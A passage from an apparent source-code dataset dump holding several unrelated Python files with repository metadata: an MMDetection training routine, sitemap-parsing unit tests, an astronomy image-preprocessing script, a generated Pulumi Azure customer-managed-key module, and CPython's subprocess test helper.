dataset,
cfg,
distributed=False,
validate=False,
timestamp=None,
meta=None):
logger = get_root_logger(cfg.log_level)
# prepare data loaders
dataset = dataset if isinstance(dataset, (list, tuple)) else [dataset]
if 'imgs_per_gpu' in cfg.data:
logger.warning('"imgs_per_gpu" is deprecated in MMDet V2.0. '
'Please use "samples_per_gpu" instead')
if 'samples_per_gpu' in cfg.data:
logger.warning(
f'Got "imgs_per_gpu"={cfg.data.imgs_per_gpu} and '
f'"samples_per_gpu"={cfg.data.samples_per_gpu}, "imgs_per_gpu"'
f'={cfg.data.imgs_per_gpu} is used in this experiments')
else:
logger.warning(
'Automatically set "samples_per_gpu"="imgs_per_gpu"='
f'{cfg.data.imgs_per_gpu} in this experiments')
cfg.data.samples_per_gpu = cfg.data.imgs_per_gpu
data_loaders = [
build_dataloader(
ds,
cfg.data.samples_per_gpu,
cfg.data.workers_per_gpu,
# cfg.gpus will be ignored if distributed
len(cfg.gpu_ids),
dist=distributed,
nonoverlap_sampler=cfg.get('nonoverlap_sampler', False),
seed=cfg.seed) for ds in dataset
]
# put model on gpus
if distributed:
find_unused_parameters = cfg.get('find_unused_parameters', True)
# Sets the `find_unused_parameters` parameter in
# torch.nn.parallel.DistributedDataParallel
model = MMDistributedDataParallel(
model.cuda(),
device_ids=[torch.cuda.current_device()],
broadcast_buffers=False,
find_unused_parameters=find_unused_parameters)
else:
model = MMDataParallel(
model.cuda(cfg.gpu_ids[0]), device_ids=cfg.gpu_ids)
# build runner
optimizer = build_optimizer(model, cfg.optimizer)
runner = EpochBasedRunner(
model,
optimizer=optimizer,
work_dir=cfg.work_dir,
logger=logger,
meta=meta)
# an ugly workaround to make .log and .log.json filenames the same
runner.timestamp = timestamp
if distributed and 'type' not in cfg.optimizer_config:
optimizer_config = OptimizerHook(**cfg.optimizer_config)
else:
optimizer_config = cfg.optimizer_config
# register hooks
runner.register_training_hooks(cfg.lr_config, optimizer_config,
cfg.checkpoint_config, cfg.log_config,
cfg.get('momentum_config', None))
if distributed:
runner.register_hook(DistSamplerSeedHook())
if cfg.resume_from:
runner.resume(cfg.resume_from)
elif cfg.load_from:
runner.load_checkpoint(cfg.load_from)
runner.run(data_loaders, cfg.workflow, cfg.total_epochs)
| 35.517857 | 79 | 0.633987 |
ace081456ba8a7a73a8bd148538b96ee450727c0 | 1,836 | py | Python | sitemapsearcher_test.py | courupteddata/SitemapSearcher | 585db780afd83cdb06f8ae88faece4c2c9aba1cb | [
"MIT"
] | null | null | null | sitemapsearcher_test.py | courupteddata/SitemapSearcher | 585db780afd83cdb06f8ae88faece4c2c9aba1cb | [
"MIT"
] | null | null | null | sitemapsearcher_test.py | courupteddata/SitemapSearcher | 585db780afd83cdb06f8ae88faece4c2c9aba1cb | [
"MIT"
] | null | null | null | import unittest
import sitemapsearcher
class ParsingRobotsTXT(unittest.TestCase):
def test_base_functionality_with_https_and_www(self):
searcher = sitemapsearcher.SitemapSearcher()
self.assertEqual(searcher._parse_robots_txt("https://www.google.com"), {"https://www.google.com/sitemap.xml"})
def test_base_functionality_with_https(self):
searcher = sitemapsearcher.SitemapSearcher()
self.assertEqual(searcher._parse_robots_txt("https://google.com"), {"https://www.google.com/sitemap.xml"})
def test_base_functionality_with_http_and_www(self):
searcher = sitemapsearcher.SitemapSearcher()
self.assertEqual(searcher._parse_robots_txt("http://www.google.com"), {"https://www.google.com/sitemap.xml"})
def test_base_functionality_with_http(self):
searcher = sitemapsearcher.SitemapSearcher()
self.assertEqual(searcher._parse_robots_txt("http://google.com"), {"https://www.google.com/sitemap.xml"})
def test_base_functionality_gzipped(self):
searcher = sitemapsearcher.SitemapSearcher()
self.assertGreaterEqual(len(searcher._parse_robots_txt("https://www.yahoo.com")), 5)
class LoadSitemapData(unittest.TestCase):
def test_normal_sitemap(self):
searcher = sitemapsearcher.SitemapSearcher()
data = searcher._load_sitemap_data("https://www.google.com/sitemap.xml")
self.assertGreaterEqual(len(data), 1000)
self.assertTrue(b"<sitemapindex" in data)
def test_gzipped_data(self):
searcher = sitemapsearcher.SitemapSearcher()
data = searcher._load_sitemap_data("https://www.yahoo.com/news/sitemaps/news-sitemap_index_US_en-US.xml.gz")
self.assertGreaterEqual(len(data), 1000)
self.assertTrue(b"<sitemapindex" in data)
if __name__ == '__main__':
unittest.main()
| 43.714286 | 118 | 0.730937 |
ace08291b176b9391cb7c641f7c96ab15c8d8c6f | 6,133 | py | Python | spit/instruments/kast.py | PYPIT/spit | 77f0687c9aeae11ad56f0c5ac2a2b2ad21eed7fb | [
"BSD-3-Clause"
] | 2 | 2018-09-25T17:06:31.000Z | 2019-07-02T18:28:55.000Z | spit/instruments/kast.py | pypeit/spit | 77f0687c9aeae11ad56f0c5ac2a2b2ad21eed7fb | [
"BSD-3-Clause"
] | 6 | 2019-07-04T13:43:55.000Z | 2019-07-26T21:31:34.000Z | spit/instruments/kast.py | PYPIT/auto_type | 77f0687c9aeae11ad56f0c5ac2a2b2ad21eed7fb | [
"BSD-3-Clause"
] | 2 | 2018-09-25T17:06:35.000Z | 2019-07-02T18:10:11.000Z | """
Generate files and perform training related to Kast
"""
from __future__ import print_function, absolute_import, division, unicode_literals
import numpy as np
import glob
import os
import pdb
from spit import generate_pngs as spit_png
from spit import preprocess
spit_path = os.getenv('SPIT_DATA')
def generate_pngs(category, clobber=False, seed=12345, debug=False, regular=True):
"""
Parameters
----------
category : str
clobber : bool, optional
debug : bool, optional
Returns
-------
"""
bidx = [0,-8]
# Pre-processing dict
pdict = preprocess.original_preproc_dict()
#
rstate = np.random.RandomState(seed)
outroot = spit_path+'/Kast/PNG/{:s}/'.format(category)
# Flats first (they are the most common)
flat_files = glob.glob(spit_path+'/Kast/FITS/{:s}/flat/*fits.gz'.format(category))
nflats = len(flat_files)
# Output dir
outdir = outroot+'flat/'
if not os.path.isdir(outdir):
os.mkdir(outdir)
# Loop me
for flat_file in flat_files:
spit_png.make_standard(flat_file, outdir, bidx, 0, pdict, clobber=clobber)
# Other image types (regularizing to the number of flats)
for itype in ['arc','bias','standard','science']:
files = glob.glob(spit_path+'/Kast/FITS/{:s}/{:s}/*fits.gz'.format(category, itype))
nfiles = len(files)
# Output dir
outdir = outroot+'{:s}/'.format(itype)
if not os.path.isdir(outdir):
os.mkdir(outdir)
# Start looping
ntot = 0 # Number of FTIS files used
step = 0 # Index looping through the image for normalization
# Loop me
while ntot < nflats:
npull = min(nflats-ntot, nfiles)
# Randomize, but use seeded to avoid new ones appearing!
rand = rstate.rand(npull)
srt = np.argsort(rand)
#if len(np.unique(srt)) != npull:
# pdb.set_trace()
#if npull < nfiles:
# pdb.set_trace()
# Loop
#save_files = []
for kk in srt:
filen = files[kk]
#if step == 5:
# print(kk, filen)
#save_files.append(filen)
spit_png.make_standard(filen, outdir, bidx, step, pdict, clobber=clobber)
# Check (Debugging)
#for ifile in save_files:
# if 'may19_2015_r1' in ifile:
# print(ifile)
#if step == 5:
# pdb.set_trace()
# Increment
step += 1
ntot += npull
# Sanity check
if regular:
for itype in ['flat', 'arc','bias','standard','science']:
outroot = spit_path+'/Kast/PNG/{:s}/{:s}'.format(category, itype)
files = glob.glob(outroot+'/*.png')
try:
assert len(files) == 4*nflats
except AssertionError:
pdb.set_trace()
def copy_over_fits(clobber=False):
import subprocess
vik_path = spit_path+'/Kast/FITS/Viktor/' # Downloaded from Google Drive
x_path = '/data/Lick/Kast/data/' # Downloaded from Google Drive
oldroot = spit_path+'/Kast/FITS/old/'
newroot = spit_path+'/Kast/FITS/'
# Skip files (bad ones somehow crept in)
bad_files = ['oct6_2016_r34'] # There are another ~9 files
for iset in ['test', 'train', 'validation']:
for itype in ['flat', 'arc','bias','standard','science']:
newdir = newroot+'/{:s}/{:s}/'.format(iset, itype)
#
files = glob.glob(oldroot+'/{:s}/{:s}/0_*.fits.gz'.format(iset,itype))
files.sort()
for ifile in files:
# Parse me
basename = os.path.basename(ifile)
if 'xavier' in basename:
i0 = basename.find('raw_')+4
i1 = basename.find('_Raw')
i2 = basename.find('.fits')
# Folder
fldr = basename[i0:i1]
fnm = basename[i1+5:i2]
# Files
xfile = x_path+'/{:s}/Raw/{:s}.fits.gz'.format(fldr, fnm)
newfile = newdir+'{:s}_{:s}.fits.gz'.format(fldr, fnm)
skip = False
if (not os.path.isfile(newfile)) or clobber:
if not skip:
subprocess.call(['cp', '-rp', xfile, newfile])
else: # Tiffany's files
continue
i0 = 2
i1 = max(basename.find('_r'), basename.find('_b'))
i2 = basename.find('.fits')
# Folder
fldr = basename[i0:i1]
fnm = basename[i1+1:i2]
# Files
vikfile = vik_path+'/{:s}/{:s}.fits.gz'.format(fldr, fnm)
newfile = newdir+'{:s}_{:s}.fits.gz'.format(fldr, fnm)
skip = False
if not os.path.isfile(vikfile):
if fldr+'_'+fnm in [bad_files]:
print("Skipping: {:s}_{:s}".format(fldr, fnm))
skip = True
else:
pdb.set_trace()
# Copy
if (not os.path.isfile(newfile)) or clobber:
if not skip:
retval = subprocess.call(['cp', '-rp', vikfile, newfile])
#### ########################## #########################
def main(flg):
# Generate PNGs
if flg & (2**0):
generate_pngs('train')
generate_pngs('test', regular=True) # Also regularized
generate_pngs('validation', regular=True) # Also regularized
# Copy over FITS files
if flg & (2**1):
copy_over_fits()
# Generate PNGs
# Command line execution
if __name__ == '__main__':
import sys
if len(sys.argv) == 1:
flg = 0
flg += 2**0 # PNGs
#flg += 2**1 # copy over FITS
else:
flg = sys.argv[1]
main(flg)
| 34.072222 | 92 | 0.503832 |
ace0836753619bd410b1bfe91ba5682cc7a0cda0 | 21,712 | py | Python | sdk/python/pulumi_azure/storage/customer_managed_key.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/storage/customer_managed_key.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/storage/customer_managed_key.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['CustomerManagedKeyArgs', 'CustomerManagedKey']
@pulumi.input_type
class CustomerManagedKeyArgs:
def __init__(__self__, *,
key_name: pulumi.Input[str],
key_vault_id: pulumi.Input[str],
storage_account_id: pulumi.Input[str],
key_version: Optional[pulumi.Input[str]] = None,
user_assigned_identity_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a CustomerManagedKey resource.
:param pulumi.Input[str] key_name: The name of Key Vault Key.
:param pulumi.Input[str] key_vault_id: The ID of the Key Vault. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_account_id: The ID of the Storage Account. Changing this forces a new resource to be created.
:param pulumi.Input[str] key_version: The version of Key Vault Key. Remove or omit this argument to enable Automatic Key Rotation.
:param pulumi.Input[str] user_assigned_identity_id: The ID of a user assigned identity.
"""
pulumi.set(__self__, "key_name", key_name)
pulumi.set(__self__, "key_vault_id", key_vault_id)
pulumi.set(__self__, "storage_account_id", storage_account_id)
if key_version is not None:
pulumi.set(__self__, "key_version", key_version)
if user_assigned_identity_id is not None:
pulumi.set(__self__, "user_assigned_identity_id", user_assigned_identity_id)
@property
@pulumi.getter(name="keyName")
def key_name(self) -> pulumi.Input[str]:
"""
The name of Key Vault Key.
"""
return pulumi.get(self, "key_name")
@key_name.setter
def key_name(self, value: pulumi.Input[str]):
pulumi.set(self, "key_name", value)
@property
@pulumi.getter(name="keyVaultId")
def key_vault_id(self) -> pulumi.Input[str]:
"""
The ID of the Key Vault. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "key_vault_id")
@key_vault_id.setter
def key_vault_id(self, value: pulumi.Input[str]):
pulumi.set(self, "key_vault_id", value)
@property
@pulumi.getter(name="storageAccountId")
def storage_account_id(self) -> pulumi.Input[str]:
"""
The ID of the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_account_id")
@storage_account_id.setter
def storage_account_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_account_id", value)
@property
@pulumi.getter(name="keyVersion")
def key_version(self) -> Optional[pulumi.Input[str]]:
"""
The version of Key Vault Key. Remove or omit this argument to enable Automatic Key Rotation.
"""
return pulumi.get(self, "key_version")
@key_version.setter
def key_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_version", value)
@property
@pulumi.getter(name="userAssignedIdentityId")
def user_assigned_identity_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of a user assigned identity.
"""
return pulumi.get(self, "user_assigned_identity_id")
@user_assigned_identity_id.setter
def user_assigned_identity_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_assigned_identity_id", value)
@pulumi.input_type
class _CustomerManagedKeyState:
def __init__(__self__, *,
key_name: Optional[pulumi.Input[str]] = None,
key_vault_id: Optional[pulumi.Input[str]] = None,
key_version: Optional[pulumi.Input[str]] = None,
storage_account_id: Optional[pulumi.Input[str]] = None,
user_assigned_identity_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering CustomerManagedKey resources.
:param pulumi.Input[str] key_name: The name of Key Vault Key.
:param pulumi.Input[str] key_vault_id: The ID of the Key Vault. Changing this forces a new resource to be created.
:param pulumi.Input[str] key_version: The version of Key Vault Key. Remove or omit this argument to enable Automatic Key Rotation.
:param pulumi.Input[str] storage_account_id: The ID of the Storage Account. Changing this forces a new resource to be created.
:param pulumi.Input[str] user_assigned_identity_id: The ID of a user assigned identity.
"""
if key_name is not None:
pulumi.set(__self__, "key_name", key_name)
if key_vault_id is not None:
pulumi.set(__self__, "key_vault_id", key_vault_id)
if key_version is not None:
pulumi.set(__self__, "key_version", key_version)
if storage_account_id is not None:
pulumi.set(__self__, "storage_account_id", storage_account_id)
if user_assigned_identity_id is not None:
pulumi.set(__self__, "user_assigned_identity_id", user_assigned_identity_id)
@property
@pulumi.getter(name="keyName")
def key_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of Key Vault Key.
"""
return pulumi.get(self, "key_name")
@key_name.setter
def key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_name", value)
@property
@pulumi.getter(name="keyVaultId")
def key_vault_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Key Vault. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "key_vault_id")
@key_vault_id.setter
def key_vault_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_vault_id", value)
@property
@pulumi.getter(name="keyVersion")
def key_version(self) -> Optional[pulumi.Input[str]]:
"""
The version of Key Vault Key. Remove or omit this argument to enable Automatic Key Rotation.
"""
return pulumi.get(self, "key_version")
@key_version.setter
def key_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_version", value)
@property
@pulumi.getter(name="storageAccountId")
def storage_account_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_account_id")
@storage_account_id.setter
def storage_account_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "storage_account_id", value)
@property
@pulumi.getter(name="userAssignedIdentityId")
def user_assigned_identity_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of a user assigned identity.
"""
return pulumi.get(self, "user_assigned_identity_id")
@user_assigned_identity_id.setter
def user_assigned_identity_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_assigned_identity_id", value)
class CustomerManagedKey(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
key_name: Optional[pulumi.Input[str]] = None,
key_vault_id: Optional[pulumi.Input[str]] = None,
key_version: Optional[pulumi.Input[str]] = None,
storage_account_id: Optional[pulumi.Input[str]] = None,
user_assigned_identity_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Customer Managed Key for a Storage Account.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
current = azure.core.get_client_config()
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_key_vault = azure.keyvault.KeyVault("exampleKeyVault",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tenant_id=current.tenant_id,
sku_name="standard",
purge_protection_enabled=True)
example_account = azure.storage.Account("exampleAccount",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
account_tier="Standard",
account_replication_type="GRS",
identity=azure.storage.AccountIdentityArgs(
type="SystemAssigned",
))
storage = azure.keyvault.AccessPolicy("storage",
key_vault_id=example_key_vault.id,
tenant_id=current.tenant_id,
object_id=example_account.identity.principal_id,
key_permissions=[
"get",
"create",
"list",
"restore",
"recover",
"unwrapkey",
"wrapkey",
"purge",
"encrypt",
"decrypt",
"sign",
"verify",
],
secret_permissions=["get"])
client = azure.keyvault.AccessPolicy("client",
key_vault_id=example_key_vault.id,
tenant_id=current.tenant_id,
object_id=current.object_id,
key_permissions=[
"get",
"create",
"delete",
"list",
"restore",
"recover",
"unwrapkey",
"wrapkey",
"purge",
"encrypt",
"decrypt",
"sign",
"verify",
],
secret_permissions=["get"])
example_key = azure.keyvault.Key("exampleKey",
key_vault_id=example_key_vault.id,
key_type="RSA",
key_size=2048,
key_opts=[
"decrypt",
"encrypt",
"sign",
"unwrapKey",
"verify",
"wrapKey",
],
opts=pulumi.ResourceOptions(depends_on=[
client,
storage,
]))
example_customer_managed_key = azure.storage.CustomerManagedKey("exampleCustomerManagedKey",
storage_account_id=example_account.id,
key_vault_id=example_key_vault.id,
key_name=example_key.name)
```
## Import
Customer Managed Keys for a Storage Account can be imported using the `resource id` of the Storage Account, e.g.
```sh
$ pulumi import azure:storage/customerManagedKey:CustomerManagedKey example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myresourcegroup/providers/Microsoft.Storage/storageAccounts/myaccount
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] key_name: The name of Key Vault Key.
:param pulumi.Input[str] key_vault_id: The ID of the Key Vault. Changing this forces a new resource to be created.
:param pulumi.Input[str] key_version: The version of Key Vault Key. Remove or omit this argument to enable Automatic Key Rotation.
:param pulumi.Input[str] storage_account_id: The ID of the Storage Account. Changing this forces a new resource to be created.
:param pulumi.Input[str] user_assigned_identity_id: The ID of a user assigned identity.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: CustomerManagedKeyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Customer Managed Key for a Storage Account.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
current = azure.core.get_client_config()
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_key_vault = azure.keyvault.KeyVault("exampleKeyVault",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tenant_id=current.tenant_id,
sku_name="standard",
purge_protection_enabled=True)
example_account = azure.storage.Account("exampleAccount",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
account_tier="Standard",
account_replication_type="GRS",
identity=azure.storage.AccountIdentityArgs(
type="SystemAssigned",
))
storage = azure.keyvault.AccessPolicy("storage",
key_vault_id=example_key_vault.id,
tenant_id=current.tenant_id,
object_id=example_account.identity.principal_id,
key_permissions=[
"get",
"create",
"list",
"restore",
"recover",
"unwrapkey",
"wrapkey",
"purge",
"encrypt",
"decrypt",
"sign",
"verify",
],
secret_permissions=["get"])
client = azure.keyvault.AccessPolicy("client",
key_vault_id=example_key_vault.id,
tenant_id=current.tenant_id,
object_id=current.object_id,
key_permissions=[
"get",
"create",
"delete",
"list",
"restore",
"recover",
"unwrapkey",
"wrapkey",
"purge",
"encrypt",
"decrypt",
"sign",
"verify",
],
secret_permissions=["get"])
example_key = azure.keyvault.Key("exampleKey",
key_vault_id=example_key_vault.id,
key_type="RSA",
key_size=2048,
key_opts=[
"decrypt",
"encrypt",
"sign",
"unwrapKey",
"verify",
"wrapKey",
],
opts=pulumi.ResourceOptions(depends_on=[
client,
storage,
]))
example_customer_managed_key = azure.storage.CustomerManagedKey("exampleCustomerManagedKey",
storage_account_id=example_account.id,
key_vault_id=example_key_vault.id,
key_name=example_key.name)
```
## Import
Customer Managed Keys for a Storage Account can be imported using the `resource id` of the Storage Account, e.g.
```sh
$ pulumi import azure:storage/customerManagedKey:CustomerManagedKey example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myresourcegroup/providers/Microsoft.Storage/storageAccounts/myaccount
```
:param str resource_name: The name of the resource.
:param CustomerManagedKeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(CustomerManagedKeyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
key_name: Optional[pulumi.Input[str]] = None,
key_vault_id: Optional[pulumi.Input[str]] = None,
key_version: Optional[pulumi.Input[str]] = None,
storage_account_id: Optional[pulumi.Input[str]] = None,
user_assigned_identity_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = CustomerManagedKeyArgs.__new__(CustomerManagedKeyArgs)
if key_name is None and not opts.urn:
raise TypeError("Missing required property 'key_name'")
__props__.__dict__["key_name"] = key_name
if key_vault_id is None and not opts.urn:
raise TypeError("Missing required property 'key_vault_id'")
__props__.__dict__["key_vault_id"] = key_vault_id
__props__.__dict__["key_version"] = key_version
if storage_account_id is None and not opts.urn:
raise TypeError("Missing required property 'storage_account_id'")
__props__.__dict__["storage_account_id"] = storage_account_id
__props__.__dict__["user_assigned_identity_id"] = user_assigned_identity_id
super(CustomerManagedKey, __self__).__init__(
'azure:storage/customerManagedKey:CustomerManagedKey',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
key_name: Optional[pulumi.Input[str]] = None,
key_vault_id: Optional[pulumi.Input[str]] = None,
key_version: Optional[pulumi.Input[str]] = None,
storage_account_id: Optional[pulumi.Input[str]] = None,
user_assigned_identity_id: Optional[pulumi.Input[str]] = None) -> 'CustomerManagedKey':
"""
Get an existing CustomerManagedKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] key_name: The name of Key Vault Key.
:param pulumi.Input[str] key_vault_id: The ID of the Key Vault. Changing this forces a new resource to be created.
:param pulumi.Input[str] key_version: The version of Key Vault Key. Remove or omit this argument to enable Automatic Key Rotation.
:param pulumi.Input[str] storage_account_id: The ID of the Storage Account. Changing this forces a new resource to be created.
:param pulumi.Input[str] user_assigned_identity_id: The ID of a user assigned identity.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _CustomerManagedKeyState.__new__(_CustomerManagedKeyState)
__props__.__dict__["key_name"] = key_name
__props__.__dict__["key_vault_id"] = key_vault_id
__props__.__dict__["key_version"] = key_version
__props__.__dict__["storage_account_id"] = storage_account_id
__props__.__dict__["user_assigned_identity_id"] = user_assigned_identity_id
return CustomerManagedKey(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="keyName")
def key_name(self) -> pulumi.Output[str]:
"""
The name of Key Vault Key.
"""
return pulumi.get(self, "key_name")
@property
@pulumi.getter(name="keyVaultId")
def key_vault_id(self) -> pulumi.Output[str]:
"""
The ID of the Key Vault. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "key_vault_id")
@property
@pulumi.getter(name="keyVersion")
def key_version(self) -> pulumi.Output[Optional[str]]:
"""
The version of Key Vault Key. Remove or omit this argument to enable Automatic Key Rotation.
"""
return pulumi.get(self, "key_version")
@property
@pulumi.getter(name="storageAccountId")
def storage_account_id(self) -> pulumi.Output[str]:
"""
The ID of the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_account_id")
@property
@pulumi.getter(name="userAssignedIdentityId")
def user_assigned_identity_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of a user assigned identity.
"""
return pulumi.get(self, "user_assigned_identity_id")
| 41.673704 | 221 | 0.621085 |
ace08406f968ca57010d146daa3e61b2c75f2276 | 10,627 | py | Python | Lib/test/support/script_helper.py | outkine/RustPython | e25443221c7852407a60eb38b0ba3c1c4e617d8f | [
"CC-BY-4.0",
"MIT"
] | 11,058 | 2018-05-29T07:40:06.000Z | 2022-03-31T11:38:42.000Z | Lib/test/support/script_helper.py | outkine/RustPython | e25443221c7852407a60eb38b0ba3c1c4e617d8f | [
"CC-BY-4.0",
"MIT"
] | 2,105 | 2018-06-01T10:07:16.000Z | 2022-03-31T14:56:42.000Z | Lib/test/support/script_helper.py | outkine/RustPython | e25443221c7852407a60eb38b0ba3c1c4e617d8f | [
"CC-BY-4.0",
"MIT"
] | 914 | 2018-07-27T09:36:14.000Z | 2022-03-31T19:56:34.000Z | # Common utility functions used by various script execution tests
# e.g. test_cmd_line, test_cmd_line_script and test_runpy
import collections
import importlib
import sys
import os
import os.path
import subprocess
import py_compile
import zipfile
from importlib.util import source_from_cache
from test.support import make_legacy_pyc, strip_python_stderr
# Cached result of the expensive test performed in the function below.
__cached_interp_requires_environment = None
def interpreter_requires_environment():
"""
Returns True if our sys.executable interpreter requires environment
variables in order to be able to run at all.
This is designed to be used with @unittest.skipIf() to annotate tests
that need to use an assert_python*() function to launch an isolated
mode (-I) or no environment mode (-E) sub-interpreter process.
A normal build & test does not run into this situation but it can happen
when trying to run the standard library test suite from an interpreter that
doesn't have an obvious home with Python's current home finding logic.
Setting PYTHONHOME is one way to get most of the testsuite to run in that
situation. PYTHONPATH or PYTHONUSERSITE are other common environment
variables that might impact whether or not the interpreter can start.
"""
global __cached_interp_requires_environment
if __cached_interp_requires_environment is None:
# If PYTHONHOME is set, assume that we need it
if 'PYTHONHOME' in os.environ:
__cached_interp_requires_environment = True
return True
# Try running an interpreter with -E to see if it works or not.
try:
subprocess.check_call([sys.executable, '-E',
'-c', 'import os, sys; sys.exit(0)'])
except subprocess.CalledProcessError:
__cached_interp_requires_environment = True
else:
__cached_interp_requires_environment = False
return __cached_interp_requires_environment
class _PythonRunResult(collections.namedtuple("_PythonRunResult",
("rc", "out", "err"))):
"""Helper for reporting Python subprocess run results"""
def fail(self, cmd_line):
"""Provide helpful details about failed subcommand runs"""
# Limit to 80 lines to ASCII characters
maxlen = 80 * 100
out, err = self.out, self.err
if len(out) > maxlen:
out = b'(... truncated stdout ...)' + out[-maxlen:]
if len(err) > maxlen:
err = b'(... truncated stderr ...)' + err[-maxlen:]
out = out.decode('ascii', 'replace').rstrip()
err = err.decode('ascii', 'replace').rstrip()
raise AssertionError("Process return code is %d\n"
"command line: %r\n"
"\n"
"stdout:\n"
"---\n"
"%s\n"
"---\n"
"\n"
"stderr:\n"
"---\n"
"%s\n"
"---"
% (self.rc, cmd_line,
out,
err))
# Executing the interpreter in a subprocess
def run_python_until_end(*args, **env_vars):
env_required = interpreter_requires_environment()
cwd = env_vars.pop('__cwd', None)
if '__isolated' in env_vars:
isolated = env_vars.pop('__isolated')
else:
isolated = not env_vars and not env_required
cmd_line = [sys.executable, '-X', 'faulthandler']
if isolated:
# isolated mode: ignore Python environment variables, ignore user
# site-packages, and don't add the current directory to sys.path
cmd_line.append('-I')
elif not env_vars and not env_required:
# ignore Python environment variables
cmd_line.append('-E')
# But a special flag that can be set to override -- in this case, the
# caller is responsible to pass the full environment.
if env_vars.pop('__cleanenv', None):
env = {}
if sys.platform == 'win32':
# Windows requires at least the SYSTEMROOT environment variable to
# start Python.
env['SYSTEMROOT'] = os.environ['SYSTEMROOT']
# Other interesting environment variables, not copied currently:
# COMSPEC, HOME, PATH, TEMP, TMPDIR, TMP.
else:
# Need to preserve the original environment, for in-place testing of
# shared library builds.
env = os.environ.copy()
# set TERM='' unless the TERM environment variable is passed explicitly
# see issues #11390 and #18300
if 'TERM' not in env_vars:
env['TERM'] = ''
env.update(env_vars)
cmd_line.extend(args)
proc = subprocess.Popen(cmd_line, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env, cwd=cwd)
with proc:
try:
out, err = proc.communicate()
finally:
proc.kill()
subprocess._cleanup()
rc = proc.returncode
err = strip_python_stderr(err)
return _PythonRunResult(rc, out, err), cmd_line
def _assert_python(expected_success, /, *args, **env_vars):
res, cmd_line = run_python_until_end(*args, **env_vars)
if (res.rc and expected_success) or (not res.rc and not expected_success):
res.fail(cmd_line)
return res
def assert_python_ok(*args, **env_vars):
"""
Assert that running the interpreter with `args` and optional environment
